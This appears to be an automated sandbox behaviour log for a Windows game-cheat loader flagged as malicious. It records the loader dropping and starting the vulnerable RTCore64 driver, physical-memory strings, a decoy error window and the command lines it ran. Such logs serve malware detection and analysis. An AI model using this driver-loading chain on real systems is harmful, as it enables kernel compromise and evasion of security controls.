Source: C:\Windows\Vulnerability.exe File created: C:\Windows\symbols\ Jump to behavior
Source: C:\Windows\Vulnerability.exe File created: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb Jump to behavior
Source: C:\Windows\Vulnerability.exe File created: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 Jump to behavior
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4145E0 4_2_00007FF7CC4145E0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC421630 4_2_00007FF7CC421630
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC411330 4_2_00007FF7CC411330
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC413CE0 4_2_00007FF7CC413CE0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4172B0 4_2_00007FF7CC4172B0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC417EA0 4_2_00007FF7CC417EA0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4232C0 4_2_00007FF7CC4232C0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC423B60 4_2_00007FF7CC423B60
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC41FBF0 4_2_00007FF7CC41FBF0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC416810 4_2_00007FF7CC416810
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC415010 4_2_00007FF7CC415010
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC416440 4_2_00007FF7CC416440
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe 4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys 27DFFDB37542AED81486B8E58762B36FC5AB4E48B76BA0AF670D13D7D78498D5
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nULoYBmSWb 01AA278B07B58DC46C84BD0B1B5C8E9EE4E62EA0BF7A695862444AF32E87F1FD
Source: C:\Windows\Vulnerability.exe Process token adjusted: Load Driver Jump to behavior
Source: C:\Windows\Vulnerability.exe Code function: String function: 00007FF7CC41A3C0 appears 102 times
Source: C:\Windows\System32\certutil.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
Source: C:\Windows\Vulnerability.exe Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\nULoYBmSWb Jump to behavior
Source: nULoYBmSWb.4.dr Binary string: \Device\PhysicalMemory
Source: driverfo.sys.0.dr Binary string: \Device\{83040329-923773830}
Source: nULoYBmSWb.4.dr Binary string: 0\DosDevices\RTCore64\Device\RTCore64
Source: classification engine Classification label: mal100.expl.evad.winEXE@27/9@1/3
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle, 4_2_00007FF7CC4214C0
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe Jump to behavior
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_03
Source: C:\Windows\Vulnerability.exe File created: C:\Users\user\AppData\Local\Temp\nULoYBmSWb Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: lUAc7lqa56.exe ReversingLabs: Detection: 37%
Source: lUAc7lqa56.exe Virustotal: Detection: 29%
Source: unknown Process created: C:\Users\user\Desktop\lUAc7lqa56.exe "C:\Users\user\Desktop\lUAc7lqa56.exe"
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\Vulnerability.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\certutil.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2256 -s 1288
Source: C:\Windows\System32\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: d3d9.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: schannel.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: apphelp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: msvcp140.dll
Source: C:\Windows\Vulnerability.exe Section loaded: dbghelp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: urlmon.dll
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\Vulnerability.exe Section loaded: iertutil.dll
Source: C:\Windows\Vulnerability.exe Section loaded: srvcli.dll
Source: C:\Windows\Vulnerability.exe Section loaded: netutils.dll
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Vulnerability.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Vulnerability.exe Section loaded: uxtheme.dll
Source: C:\Windows\Vulnerability.exe Section loaded: wininet.dll
Source: C:\Windows\Vulnerability.exe Section loaded: sspicli.dll
Source: C:\Windows\Vulnerability.exe Section loaded: windows.storage.dll
Source: C:\Windows\Vulnerability.exe Section loaded: wldp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: profapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Vulnerability.exe Section loaded: winhttp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: mswsock.dll
Source: C:\Windows\Vulnerability.exe Section loaded: winnsi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: dnsapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Vulnerability.exe Section loaded: schannel.dll
Source: C:\Windows\Vulnerability.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Vulnerability.exe Section loaded: ntasn1.dll
Source: C:\Windows\Vulnerability.exe Section loaded: msasn1.dll
Source: C:\Windows\Vulnerability.exe Section loaded: dpapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: cryptsp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: rsaenh.dll
Source: C:\Windows\Vulnerability.exe Section loaded: cryptbase.dll
Source: C:\Windows\Vulnerability.exe Section loaded: gpapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: ncrypt.dll
Source: C:\Windows\Vulnerability.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certca.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\certutil.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\certutil.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: lUAc7lqa56.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: lUAc7lqa56.exe Static file information: File size 6062592 > 1048576
Source: lUAc7lqa56.exe Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x5c7a00
Source: lUAc7lqa56.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb. source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb0 source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb2u.dllK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbAy> source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\os\obj\amd64fre\onecoreuap\windows\core\kmode\moderncore\objfre\amd64\typeinfo\win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879045308.000002181DC7C000.00000004.00000020.00020000.00000000.sdmp, AB6E94A2098C7E1ADF1A0B7B18448F0D6B5F55AA62BB62760C12A51161058F4B00[1].blob.4.dr, 74b74f1f14570c9cf7868ff6d4bda773.pdb.4.dr
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879638400.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881318765.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880040885.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbZ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbY source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /win32k.pdb" source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbiz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdb % source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb_ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!x source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5n source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbYz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb)y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798931127.00000245E10C0000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb@ source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1797006532.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols4b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5zs source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
